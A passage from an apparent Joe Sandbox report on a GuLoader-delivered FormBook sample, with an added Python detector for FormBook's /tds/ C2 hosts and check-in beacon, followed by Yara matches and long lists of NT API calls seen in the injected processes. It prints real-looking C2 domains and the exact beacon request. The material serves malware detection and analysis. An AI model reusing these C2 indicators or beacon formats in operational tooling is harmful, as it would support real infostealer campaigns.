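The memory strings above carry two different kinds of network indicator. The OneDrive URLs in the Details Transfer.exe dumps are where the GuLoader stage fetched its payload; the explorer.exe dump holds the FormBook domain set, recognisable by the shared /tds/ path and by leftover formatting such as "www.X/tds/www.Y" and "www.XReferer:", mixed with unrelated font-vendor and CRL URLs. The one request that was actually observed, GET /tds/?EZA0Ip=...&DzuXT=... with no User-Agent, Connection: close and a seven-byte all-zero body, is the check-in. The Python below is an added example, not part of the Joe Sandbox report: it pulls the /tds/ host set out of a subset of the strings listed above (the list is constructed from them), reassembles the observed request as bytes, and scores requests against the four traits of that check-in alongside the extracted host set. The trait thresholds and the "all four must hold" rule are assumptions for this example, not a published FormBook signature.

```python
"""Extract FormBook /tds/ hosts from memory strings and score HTTP requests against them.

Added example; not part of the Joe Sandbox report. MEMORY_STRINGS is a subset
of the strings listed above, BEACON is the observed request rebuilt as bytes,
BENIGN is constructed, and the beacon traits/threshold are assumptions.
"""
import re
from typing import Dict, List, Optional, Set, Tuple

MEMORY_STRINGS: List[str] = [
    "http://www.airesdeblend.com/tds/www.bilzy.info",
    "http://www.airesdeblend.comReferer:",
    "http://www.especiaperu.com/tds/www.muzickaoprema.com",
    "http://www.muzickaoprema.com/tds/www.purepumptech.com",
    "http://www.muzickaoprema.com/tds/",
    "http://www.virtualipassistant.com/tds/www.airesdeblend.com",
    "http://www.fontbureau.com/designers",        # font metadata noise
    "http://crl.globalsign.net/root-r2.crl0",     # certificate noise
    "https://onedrive.live.com/",                 # loader download host, not the stealer's
]

# Only strings shaped "http(s)://www.<host>/tds/[www.<host>]" are taken as C2 candidates.
TDS_RE = re.compile(r"^https?://(www\.[a-z0-9.-]+)/tds/(www\.[a-z0-9.-]+)?$", re.I)


def c2_hosts(strings: List[str]) -> Set[str]:
    """Hosts seen with the /tds/ path, including the one glued on after it."""
    hosts: Set[str] = set()
    for s in strings:
        m = TDS_RE.match(s.strip())
        if m:
            hosts.add(m.group(1).lower())
            if m.group(2):
                hosts.add(m.group(2).lower())
    return hosts


# The request from the "HTTP traffic detected" line above, rebuilt as raw bytes.
BEACON = (
    b"GET /tds/?EZA0Ip=cSys95436I04mSADwpQi1ekt4VEAsUhCMEpuZHXtcAsHrFUQZFLk08BXkTL1uisVhU9w&DzuXT=Bzr4g89 HTTP/1.1\r\n"
    b"Host: www.muzickaoprema.com\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"\x00\x00\x00\x00\x00\x00\x00"
)
# Constructed browser-like request with the same path shape, to show the other traits matter.
BENIGN = (
    b"GET /tds/?EZA0Ip=abc&DzuXT=def HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
)

# One path segment, then exactly two key=value query parameters.
PATH_RE = re.compile(r"^/[a-z0-9]+/\?[A-Za-z0-9]+=[A-Za-z0-9_-]+&[A-Za-z0-9]+=[A-Za-z0-9_-]+$")


def parse_request(raw: bytes) -> Optional[Tuple[str, str, Dict[str, str], bytes]]:
    """Split a raw HTTP/1.1 request into (method, path, headers, body); None if malformed."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3:
        return None
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        k, _, v = line.partition(b":")
        headers[k.strip().lower().decode()] = v.strip().decode(errors="replace")
    return parts[0].decode(), parts[1].decode(errors="replace"), headers, body


def beacon_reasons(raw: bytes) -> List[str]:
    """Which of the four observed check-in traits a request shows (assumed trait set)."""
    parsed = parse_request(raw)
    if parsed is None:
        return ["malformed"]
    _, path, headers, body = parsed
    reasons = []
    if "user-agent" not in headers:
        reasons.append("no User-Agent")
    if PATH_RE.match(path):
        reasons.append("two-parameter query under a one-segment path")
    if headers.get("connection", "").lower() == "close":
        reasons.append("Connection: close")
    if body and body == b"\x00" * len(body):
        reasons.append(f"{len(body)}-byte all-zero body")
    return reasons


def is_formbook_beacon(raw: bytes) -> bool:
    return len(beacon_reasons(raw)) == 4          # assumed: all four traits required


def triage(raw: bytes, hosts: Set[str]) -> Dict[str, object]:
    parsed = parse_request(raw)
    host = parsed[2].get("host", "").lower() if parsed else ""
    return {"host": host, "known_c2": host in hosts,
            "beacon": is_formbook_beacon(raw), "reasons": beacon_reasons(raw)}


if __name__ == "__main__":
    hosts = c2_hosts(MEMORY_STRINGS)
    print("hosts:", sorted(hosts))
    for name, req in (("beacon", BEACON), ("benign", BENIGN)):
        print(name, triage(req, hosts))
```

The host set is the cheaper indicator to deploy but it rots as the operator rotates domains; the request shape is what survives that rotation, which is why the example keeps both and reports them separately.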

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0000000C.00000002.471474023.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.472575056.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.472634942.0000000000F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.301196931.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.305279752.000000001E120000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000C.00000002.471474023.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.471474023.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.472575056.0000000000F10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.472575056.0000000000F10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.472634942.0000000000F40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.472634942.0000000000F40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.301196931.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.301196931.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.471837023.0000000000BA2000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
Source: 0000000C.00000002.476551584.000000000534F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
Source: 00000002.00000002.305279752.000000001E120000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.305279752.000000001E120000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 0_2_04F4151A NtWriteVirtualMemory, 0_2_04F4151A
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 0_2_04F40208 EnumWindows, NtSetInformationThread, TerminateProcess, LoadLibraryA, 0_2_04F40208
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 0_2_04F433D0 NtSetInformationThread, TerminateProcess, LoadLibraryA, 0_2_04F433D0
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 0_2_04F4378D NtProtectVirtualMemory, 0_2_04F4378D
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 0_2_04F43B69 NtSetInformationThread, TerminateProcess, NtResumeThread, 0_2_04F43B69
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 0_2_04F40CE1 NtWriteVirtualMemory, 0_2_04F40CE1
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 0_2_04F41005 NtWriteVirtualMemory, 0_2_04F41005
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 0_2_04F42982 NtWriteVirtualMemory, 0_2_04F42982
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 0_2_04F40295 NtSetInformationThread, TerminateProcess, 0_2_04F40295
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 0_2_04F40247 NtSetInformationThread, TerminateProcess, 0_2_04F40247
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 0_2_04F41622 NtWriteVirtualMemory, 0_2_04F41622
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 0_2_04F417FA NtWriteVirtualMemory, 0_2_04F417FA
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 0_2_04F43BED NtResumeThread, 0_2_04F43BED
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 0_2_04F43BC0 NtResumeThread, 0_2_04F43BC0
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 0_2_04F43B98 NtResumeThread, 0_2_04F43B98
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 0_2_04F43B81 NtResumeThread, 0_2_04F43B81
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9660 NtAllocateVirtualMemory, LdrInitializeThunk, 2_2_1E3B9660
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B96E0 NtFreeVirtualMemory, LdrInitializeThunk, 2_2_1E3B96E0
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9710 NtQueryInformationToken, LdrInitializeThunk, 2_2_1E3B9710
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B97A0 NtUnmapViewOfSection, LdrInitializeThunk, 2_2_1E3B97A0
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9780 NtMapViewOfSection, LdrInitializeThunk, 2_2_1E3B9780
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9540 NtReadFile, LdrInitializeThunk, 2_2_1E3B9540
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B95D0 NtClose, LdrInitializeThunk, 2_2_1E3B95D0
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9A20 NtResumeThread, LdrInitializeThunk, 2_2_1E3B9A20
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9A00 NtProtectVirtualMemory, LdrInitializeThunk, 2_2_1E3B9A00
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9A50 NtCreateFile, LdrInitializeThunk, 2_2_1E3B9A50
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9860 NtQuerySystemInformation, LdrInitializeThunk, 2_2_1E3B9860
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9840 NtDelayExecution, LdrInitializeThunk, 2_2_1E3B9840
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B98F0 NtReadVirtualMemory, LdrInitializeThunk, 2_2_1E3B98F0
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9910 NtAdjustPrivilegesToken, LdrInitializeThunk, 2_2_1E3B9910
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B99A0 NtCreateSection, LdrInitializeThunk, 2_2_1E3B99A0
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9610 NtEnumerateValueKey, 2_2_1E3B9610
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9670 NtQueryInformationProcess, 2_2_1E3B9670
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9650 NtQueryValueKey, 2_2_1E3B9650
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B96D0 NtCreateKey, 2_2_1E3B96D0
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9730 NtQueryVirtualMemory, 2_2_1E3B9730
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3BA710 NtOpenProcessToken, 2_2_1E3BA710
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3BA770 NtOpenThread, 2_2_1E3BA770
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9770 NtSetInformationFile, 2_2_1E3B9770
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9760 NtOpenProcess, 2_2_1E3B9760
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9FE0 NtCreateMutant, 2_2_1E3B9FE0
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3BAD30 NtSetContextThread, 2_2_1E3BAD30
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9520 NtWaitForSingleObject, 2_2_1E3B9520
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9560 NtWriteFile, 2_2_1E3B9560
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B95F0 NtQueryInformationFile, 2_2_1E3B95F0
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9A10 NtQuerySection, 2_2_1E3B9A10
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9A80 NtOpenDirectoryObject, 2_2_1E3B9A80
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9B00 NtSetValueKey, 2_2_1E3B9B00
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3BA3B0 NtGetContextThread, 2_2_1E3BA3B0
Source: C:\Users\user\Desktop\Details Transfer.exe | Code function: 2_2_1E3B9820 NtEnumerateKey, 2_2_1E3B9820
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3BB040 NtSuspendThread,2_2_1E3BB040
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B98A0 NtWriteVirtualMemory,2_2_1E3B98A0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9950 NtQueueApcThread,2_2_1E3B9950
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B99D0 NtCreateProcessEx,2_2_1E3B99D0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_00563B69 NtSetInformationThread,NtSetInformationThread,2_2_00563B69
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_005633D0 NtSetInformationThread,LoadLibraryA,2_2_005633D0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_0056378D NtProtectVirtualMemory,2_2_0056378D
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_00560247 NtSetInformationThread,2_2_00560247
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_00560603 NtProtectVirtualMemory,2_2_00560603
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_00560295 NtSetInformationThread,2_2_00560295
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_00563BC0 NtSetInformationThread,2_2_00563BC0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_00563BED NtSetInformationThread,2_2_00563BED
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_00563B98 NtSetInformationThread,2_2_00563B98
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_00563B81 NtSetInformationThread,2_2_00563B81
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E895D0 NtClose,LdrInitializeThunk, 12_2_04E895D0
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89540 NtReadFile,LdrInitializeThunk, 12_2_04E89540
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E896E0 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_04E896E0
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E896D0 NtCreateKey,LdrInitializeThunk, 12_2_04E896D0
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89660 NtAllocateVirtualMemory,LdrInitializeThunk, 12_2_04E89660
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89650 NtQueryValueKey,LdrInitializeThunk, 12_2_04E89650
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89FE0 NtCreateMutant,LdrInitializeThunk, 12_2_04E89FE0
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89780 NtMapViewOfSection,LdrInitializeThunk, 12_2_04E89780
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89710 NtQueryInformationToken,LdrInitializeThunk, 12_2_04E89710
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89860 NtQuerySystemInformation,LdrInitializeThunk, 12_2_04E89860
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89840 NtDelayExecution,LdrInitializeThunk, 12_2_04E89840
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E899A0 NtCreateSection,LdrInitializeThunk, 12_2_04E899A0
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89910 NtAdjustPrivilegesToken,LdrInitializeThunk, 12_2_04E89910
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89A50 NtCreateFile,LdrInitializeThunk, 12_2_04E89A50
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E895F0 NtQueryInformationFile, 12_2_04E895F0
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89560 NtWriteFile, 12_2_04E89560
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89520 NtWaitForSingleObject, 12_2_04E89520
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E8AD30 NtSetContextThread, 12_2_04E8AD30
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89670 NtQueryInformationProcess, 12_2_04E89670
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89610 NtEnumerateValueKey, 12_2_04E89610
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E897A0 NtUnmapViewOfSection, 12_2_04E897A0
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89760 NtOpenProcess, 12_2_04E89760
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E8A770 NtOpenThread, 12_2_04E8A770
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89770 NtSetInformationFile, 12_2_04E89770
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89730 NtQueryVirtualMemory, 12_2_04E89730
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E8A710 NtOpenProcessToken, 12_2_04E8A710
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E898F0 NtReadVirtualMemory, 12_2_04E898F0
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E898A0 NtWriteVirtualMemory, 12_2_04E898A0
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E8B040 NtSuspendThread, 12_2_04E8B040
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89820 NtEnumerateKey, 12_2_04E89820
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E899D0 NtCreateProcessEx, 12_2_04E899D0
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89950 NtQueueApcThread, 12_2_04E89950
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89A80 NtOpenDirectoryObject, 12_2_04E89A80
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89A20 NtResumeThread, 12_2_04E89A20
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89A00 NtProtectVirtualMemory, 12_2_04E89A00
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89A10 NtQuerySection, 12_2_04E89A10
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E8A3B0 NtGetContextThread, 12_2_04E8A3B0
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E89B00 NtSetValueKey, 12_2_04E89B00
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B09D50 NtCreateFile, 12_2_00B09D50
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B09E80 NtClose, 12_2_00B09E80
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B09E00 NtReadFile, 12_2_00B09E00
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B09F30 NtAllocateVirtualMemory, 12_2_00B09F30
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B09D4A NtCreateFile, 12_2_00B09D4A
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B09F2B NtAllocateVirtualMemory, 12_2_00B09F2B
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_0040147C 0_2_0040147C
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E396E30 2_2_1E396E30
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E43D616 2_2_1E43D616
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E442EF7 2_2_1E442EF7
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E44DFCE 2_2_1E44DFCE
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E441FF1 2_2_1E441FF1
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E43D466 2_2_1E43D466
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E38841F 2_2_1E38841F
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E441D55 2_2_1E441D55
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E370D20 2_2_1E370D20
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E442D07 2_2_1E442D07
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E4425DD 2_2_1E4425DD
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E3A2581 2_2_1E3A2581
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E38D5E0 2_2_1E38D5E0
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E4422AE 2_2_1E4422AE
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E442B28 2_2_1E442B28
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E3AEBB0 2_2_1E3AEBB0
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E43DBD2 2_2_1E43DBD2
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E4303DA 2_2_1E4303DA
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E431002 2_2_1E431002
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E44E824 2_2_1E44E824
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E3A20A0 2_2_1E3A20A0
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E38B090 2_2_1E38B090
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E4428EC 2_2_1E4428EC
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E4420A8 2_2_1E4420A8
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E394120 2_2_1E394120
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E37F900 2_2_1E37F900
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04F0D466 12_2_04F0D466
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E5841F 12_2_04E5841F
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E5D5E0 12_2_04E5D5E0
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04F125DD 12_2_04F125DD
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E72581 12_2_04E72581
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04F11D55 12_2_04F11D55
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E40D20 12_2_04E40D20
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04F12D07 12_2_04F12D07
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04F12EF7 12_2_04F12EF7
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E66E30 12_2_04E66E30
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04F0D616 12_2_04F0D616
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04F11FF1 12_2_04F11FF1
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04F1DFCE 12_2_04F1DFCE
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04F128EC 12_2_04F128EC
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E720A0 12_2_04E720A0
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04F120A8 12_2_04F120A8
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E5B090 12_2_04E5B090
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04F1E824 12_2_04F1E824
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E6A830 12_2_04E6A830
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04F01002 12_2_04F01002
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E699BF 12_2_04E699BF
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E64120 12_2_04E64120
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E4F900 12_2_04E4F900
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04F122AE 12_2_04F122AE
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04EFFA2B 12_2_04EFFA2B
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04F0DBD2 12_2_04F0DBD2
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04F003DA 12_2_04F003DA
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E7ABD8 12_2_04E7ABD8
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E7EBB0 12_2_04E7EBB0
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E6AB40 12_2_04E6AB40
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04F12B28 12_2_04F12B28
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E6A309 12_2_04E6A309
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B0D80B 12_2_00B0D80B
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B0D234 12_2_00B0D234
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B0E223 12_2_00B0E223
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00AF2D89 12_2_00AF2D89
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00AF2D90 12_2_00AF2D90
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00AF9E2D 12_2_00AF9E2D
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00AF9E30 12_2_00AF9E30
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B0E619 12_2_00B0E619
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B0DE40 12_2_00B0DE40
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B0DFBC 12_2_00B0DFBC
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00AF2FB0 12_2_00AF2FB0
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B0CF96 12_2_00B0CF96
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: String function: 1E37B150 appears 39 times
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: String function: 04E4B150 appears 87 times
      Source: Details Transfer.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Details Transfer.exe, 00000000.00000002.226169530.00000000022F0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs Details Transfer.exe
      Source: Details Transfer.exe, 00000000.00000002.226000362.000000000040C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamepellet.exe vs Details Transfer.exe
      Source: Details Transfer.exe, 00000002.00000002.305063110.000000001DC30000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Details Transfer.exe
      Source: Details Transfer.exe, 00000002.00000002.306341652.000000001E5FF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Details Transfer.exe
